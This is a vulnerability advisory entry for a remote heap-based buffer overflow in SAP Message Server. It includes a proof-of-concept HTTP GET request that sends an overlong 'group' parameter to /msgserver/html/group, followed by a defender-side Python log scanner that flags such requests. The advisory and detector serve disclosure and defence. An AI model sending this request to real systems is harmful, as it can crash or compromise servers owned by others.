Vendor: SAP Message Server
By:
CVSS: 9 (CRITICAL)
Remote heap-based buffer-overflow
CWE: 119
Product Name: SAP Message Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

SAP Message Server Remote Heap-based Buffer Overflow Vulnerability

The SAP Message Server is vulnerable to a remote heap-based buffer overflow. The vulnerability occurs due to inadequate boundary checks on user-supplied data before copying it to a buffer of insufficient size. Remote attackers can exploit this vulnerability to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers, while failed attacks may cause denial-of-service conditions disabling all functionality of the application.

Mitigation:

It is recommended to apply the latest patches and updates provided by the vendor to mitigate this vulnerability. Additionally, network-level controls such as firewalls can help prevent remote exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24765/info

SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.

Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application. 

GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive
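
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to /msgserver/html/group whose decoded group value is unusually long. The 64-byte threshold, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

TARGET_PATH = "/msgserver/html/group"
# Assumption: legitimate logon group names are short; tune this for your landscape.
MAX_GROUP_LEN = 64

# Request line inside a common/combined-format log entry, or a bare request line.
REQUEST_RE = re.compile(r'(?:^|")(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d')

def group_lengths(line):
    """Return the decoded length of every `group` value sent to TARGET_PATH."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    # Decode and lower-case the path so encoding or case tricks do not hide it.
    if not unquote(path).lower().rstrip("/").endswith(TARGET_PATH):
        return []
    # latin-1 maps one byte to one character, so len() is the decoded byte
    # count even when the value arrives percent-encoded.
    pairs = parse_qsl(query, keep_blank_values=True, encoding="latin-1")
    return [len(v) for k, v in pairs if k.lower() == "group"]

def scan(lines, max_len=MAX_GROUP_LEN):
    """Return (line_number, length) for each request with an oversized group."""
    hits = []
    for n, line in enumerate(lines, 1):
        for length in group_lengths(line):
            if length > max_len:
                hits.append((n, length))
    return hits

# Constructed sample log lines (not taken from a real system).
_REQ = '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET '
SAMPLE_LOG = [
    _REQ + '/msgserver/html/group?group=PUBLIC HTTP/1.0" 200 312',
    _REQ + '/msgserver/html/group?group=' + "A" * 498 + ' HTTP/1.0" 500 0',
    _REQ + '/msgserver/html/group?group=' + "%41" * 200 + ' HTTP/1.0" 500 0',
    _REQ + '/index.html?group=' + "A" * 498 + ' HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for n, length in scan(SAMPLE_LOG):
        print(f"line {n}: group parameter is {length} bytes")
```

The same length limit can be enforced at a reverse proxy or web application firewall in front of the Message Server HTTP port, in line with the network-level controls recommended under Mitigation.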